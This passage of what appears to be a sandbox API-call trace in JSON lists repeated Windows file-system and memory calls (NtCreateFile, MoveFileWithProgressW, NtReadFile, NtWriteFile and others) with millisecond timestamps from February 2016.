"NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,282", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,292", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,292", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,302", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:55,302", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,302", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,312", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,312", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,312", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,322", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,332", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,332", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,332", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:55,342", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,342", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,342", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,352", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,352", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,352", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,362", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,362", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,372", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,372", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,372", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,382", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,382", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,392", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,392", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,392", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,402", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,402", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,412", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,412", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,412", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,422", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:55,432", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,432", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,442", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:55,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,452", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,452", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,462", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,472", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,472", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:55,482", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,492", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,492", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,502", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,512", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,512", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,512", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,512", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,512", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,512", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,522", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,522", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,522", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,522", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,522", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,522", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,522", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,522", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:55,532", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,532", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,532", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,532", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,532", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,542", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,562", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,572", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,572", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:55,572", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,572", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,572", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,572", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,582", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,582", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,592", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,602", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,602", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 